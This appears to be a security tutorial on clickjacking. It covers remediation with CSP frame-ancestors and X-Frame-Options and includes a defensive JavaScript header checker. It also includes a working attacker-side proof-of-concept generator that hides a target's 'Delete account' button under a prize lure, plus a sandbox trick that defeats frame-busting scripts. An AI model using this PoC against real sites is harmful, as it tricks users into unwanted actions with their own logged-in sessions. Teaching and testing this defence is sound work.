Clickjacking

Description

Clickjacking, also sometimes called a UI redress attack, is when an attacker loads the target page in an iframe on a page they control, makes that iframe transparent (or otherwise hides it) and positions it so that a button or link in the hidden frame sits exactly over something the user wants to click. The user thinks they are clicking on the page they can see, but the click actually lands in the invisible iframe layered on top, and the user is thereby tricked into performing an action on the target site with their own logged-in session.

What can happen?

The impact of clickjacking depends entirely on what action the attacker can trick the victim into performing. It is often something fairly harmless, such as harvesting Facebook likes, but it can range to things like turning on the victim's web camera or transferring money from a bank account, since the click is made with the victim's own authenticated session on the target site.

Example of Clickjacking

A code example of a vulnerable page is of little use, because every web page is frameable by default: a browser will load any URL into an iframe on any other site unless the response tells it not to. Protection therefore has to be added explicitly to every page that performs a sensitive action; a page that sends no framing policy is vulnerable to clickjacking.

Clickjacking does not only affect websites but also browser plugins. One of the best-known examples was the settings page of the Adobe Flash plugin. By loading that page into an invisible iframe, an attacker could trick the user into granting the attacker's site access to their web camera, enabling the attacker to spy on the victim.
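What can usefully be shown is the attacker's side. The following is an added example, not code from the original article: a small JavaScript helper that generates the classic clickjacking proof-of-concept page, with a visible decoy button underneath and the target page in a fully transparent iframe on top, shifted so that the sensitive button inside the framed page sits exactly under the decoy. The target URL (victim.example), the button coordinates and the decoy layout are all assumed values chosen for illustration.

```javascript
// Added example, not from the original article. Generates the attacker-side
// proof-of-concept page used to demonstrate clickjacking. All values below
// (target URL, button position, decoy layout) are assumptions for illustration.

// Where on the attacker's page the visible decoy button is placed.
const DECOY_POSITION = { left: 240, top: 180 };

function frameOffset(button, decoy) {
  // Position the iframe so the target button's top-left corner, given in the
  // framed page's own coordinates, lands exactly on the decoy's top-left
  // corner. A negative offset pulls the framed page up/left behind the decoy.
  return { left: decoy.left - button.x, top: decoy.top - button.y };
}

function buildClickjackPoc({ targetUrl, button, decoyLabel, opacity = 0 }) {
  // The decoy takes the target button's size so that every click on the decoy
  // lands on the real button and not next to it.
  const decoy = { ...DECOY_POSITION, width: button.width, height: button.height };
  const off = frameOffset(button, decoy);
  // Keep the framed page at a desktop-like width so it lays out the same way
  // it did when the button coordinates were measured.
  const frameWidth = Math.max(1280, button.x + button.width + 50);
  const frameHeight = Math.max(800, button.y + button.height + 50);

  // decoyLabel and targetUrl are chosen by the attacker, so no escaping is done.
  return `<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>You have won a prize</title>
<style>
  body { margin: 0; font-family: sans-serif; }
  /* Visible decoy: sits underneath the transparent frame, so the user sees
     it but the click never reaches it. */
  #decoy { position: absolute; left: ${decoy.left}px; top: ${decoy.top}px;
           width: ${decoy.width}px; height: ${decoy.height}px; z-index: 1; }
  /* Target page: on top of the decoy and fully transparent. Raise opacity
     to about 0.3 while aligning the PoC, then set it back to 0. */
  #target { position: absolute; left: ${off.left}px; top: ${off.top}px;
            width: ${frameWidth}px; height: ${frameHeight}px;
            opacity: ${opacity}; border: 0; z-index: 2; }
</style>
</head>
<body>
<p>Congratulations! Click the button to claim your prize.</p>
<button id="decoy">${decoyLabel}</button>
<iframe id="target" src="${targetUrl}"></iframe>
</body>
</html>`;
}

// Assumed target: a "Delete account" button 640px from the left and 480px from
// the top of https://victim.example/settings, measured in the victim's page.
const poc = buildClickjackPoc({
  targetUrl: 'https://victim.example/settings',
  button: { x: 640, y: 480, width: 120, height: 40 },
  decoyLabel: 'Claim prize',
});
console.log(poc);
```

Save the output as an HTML file and open it in a browser that is logged in to the target; with the opacity raised you can verify the alignment before making the frame invisible. If the target sends a framing policy, the iframe simply stays blank and the proof of concept fails.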

Remediation

What you want to do is prevent the attacker from framing the page at all. That can be done in more than one way, but we would recommend the Content-Security-Policy directive frame-ancestors. It is also possible to use the older X-Frame-Options header, which will not be covered here beyond noting that it is still worth sending alongside a CSP for old browsers, and that a browser which understands frame-ancestors ignores X-Frame-Options when both are present.

To disallow framing entirely, send the following policy:
Content-Security-Policy: frame-ancestors 'none'

To allow framing only by pages from the same origin (same scheme, host and port), use:
Content-Security-Policy: frame-ancestors 'self'

And lastly, to allow only specific origins to frame the page while disallowing all others:
Content-Security-Policy: frame-ancestors trusted.com

Note that the quotes around 'none' and 'self' are part of the syntax, that a host entry such as trusted.com does not match its subdomains (use *.trusted.com for that), and that frame-ancestors only works when delivered as an HTTP response header; browsers ignore it in a <meta http-equiv> tag. Please read about CSP in general before implementing any of these.
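Because the policies above behave differently for different embedding origins, and because an X-Frame-Options header sent alongside is ignored whenever an enforced frame-ancestors directive is present, it helps to have the evaluation written down. The following is an added example, not code from the original article or from any browser: a JavaScript function that takes a response's headers, the framed page's origin and the prospective embedder's origin and reports whether framing would be allowed. The header samples and origins (app.example, trusted.com, partner.example) are constructed for illustration, and path matching in host sources is left out.

```javascript
// Added example, not from the original article: evaluate a response's headers
// and decide whether a given origin is allowed to frame the page, with the
// precedence browsers apply. An enforced CSP frame-ancestors directive is
// authoritative; X-Frame-Options is only consulted when no such directive is
// present. Origins and headers used below are constructed for illustration.

function headerValues(headers, name) {
  // Case-insensitive lookup; a header may be given once or as an array.
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
  if (key === undefined) return [];
  return Array.isArray(headers[key]) ? headers[key] : [headers[key]];
}

function frameAncestorSourceLists(headers) {
  // One source list per enforced frame-ancestors directive. Several policies
  // may be present (multiple headers, or comma-joined); all must allow the
  // ancestor. Content-Security-Policy-Report-Only is ignored on purpose: it
  // only reports, it never blocks.
  const lists = [];
  for (const raw of headerValues(headers, 'content-security-policy')) {
    for (const policy of raw.split(',')) {
      for (const directive of policy.split(';')) {
        const tokens = directive.trim().split(/\s+/).filter(Boolean);
        if (tokens.length > 0 && tokens[0].toLowerCase() === 'frame-ancestors') {
          lists.push(tokens.slice(1));
        }
      }
    }
  }
  return lists;
}

function defaultPort(protocol) {
  return protocol === 'https:' ? '443' : protocol === 'http:' ? '80' : '';
}

function sourceMatches(source, pageOrigin, embedderOrigin) {
  const src = source.toLowerCase();
  const page = new URL(pageOrigin);
  const embedder = new URL(embedderOrigin);
  if (src === "'none'") return false;
  if (src === "'self'") return page.origin === embedder.origin;
  if (src === '*') return true;
  // Scheme-source such as "https:" matches any origin with that scheme.
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return embedder.protocol === src;
  // Host-source: [scheme://][*.]host[:port]  (path part not handled here)
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)(?::(\d+|\*))?/.exec(src);
  if (m === null) return false;
  const [, scheme, wildcard, host, port] = m;
  // Without an explicit scheme the embedder must use the page's scheme (an
  // https embedder is also accepted for an http page).
  const schemeOk = scheme
    ? embedder.protocol === `${scheme}:`
    : embedder.protocol === page.protocol ||
      (page.protocol === 'http:' && embedder.protocol === 'https:');
  const hostOk = wildcard
    ? embedder.hostname.endsWith(`.${host}`)
    : embedder.hostname === host;
  // URL normalises a default port to ''; a source without a port only matches
  // the default port, so trusted.com does not match https://trusted.com:8443.
  const portOk = port === undefined
    ? embedder.port === ''
    : port === '*' || embedder.port === port ||
      (embedder.port === '' && defaultPort(embedder.protocol) === port);
  return schemeOk && hostOk && portOk;
}

function isFrameable(headers, pageOrigin, embedderOrigin) {
  // Only the direct parent is checked here; browsers check every ancestor in
  // the frame chain against the same policy.
  const lists = frameAncestorSourceLists(headers);
  if (lists.length > 0) {
    // "frame-ancestors" with an empty source list allows no ancestor at all,
    // which .some() on an empty array reflects.
    return lists.every((sources) =>
      sources.some((s) => sourceMatches(s, pageOrigin, embedderOrigin)));
  }
  const xfo = headerValues(headers, 'x-frame-options')
    .flatMap((v) => v.split(','))
    .map((v) => v.trim().toUpperCase())
    .filter(Boolean);
  if (xfo.includes('DENY')) return false;
  if (xfo.includes('SAMEORIGIN')) {
    return new URL(pageOrigin).origin === new URL(embedderOrigin).origin;
  }
  // Anything else (no header, ALLOW-FROM, ALLOWALL, junk) is not enforced by
  // current browsers, so the page can be framed by anyone.
  return true;
}

// Constructed sample: the CSP allows same-origin and partner subdomains; the
// X-Frame-Options DENY next to it is ignored because frame-ancestors is set.
const sampleHeaders = {
  'content-security-policy': "default-src 'self'; frame-ancestors 'self' *.partner.example",
  'x-frame-options': 'DENY',
};
console.log(isFrameable(sampleHeaders, 'https://app.example', 'https://widgets.partner.example')); // true
```

Running this over the headers of every authenticated page is a quick way to find the ones that rely on a report-only policy, a CSP without frame-ancestors, or an ALLOW-FROM value that current browsers no longer honour.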

In cases where the page genuinely must be frameable, a window.confirm() dialog before the sensitive action can be used as an alternative protection. It does not look very modern, but the dialog is drawn by the browser rather than by the page, so the attacker's page cannot hide it or answer it on the user's behalf; if the user has to accept the action in that way, a clickjacked click alone is not enough. Current Chromium-based browsers additionally refuse to show confirm() dialogs from cross-origin iframes at all, in which case the call simply returns false and the action is never taken.

Insufficient remediation methods

There are also a lot of JavaScript "frame-busting" scripts out there written to protect against clickjacking, typically by checking whether top !== self and then navigating the top window away from the attacker's page. Many of those do not work or can be bypassed: for example, the attacker can load the page in an iframe with a sandbox attribute that omits allow-top-navigation, after which the framed page's script is not permitted to change the top-level location at all. We would therefore recommend staying away from those.

As all browsers in use today support the header-based remediation explained above, we see no reason to still use the JavaScript-based ones.

Resources

OWASP: Clickjacking Defense Cheat Sheet (https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html)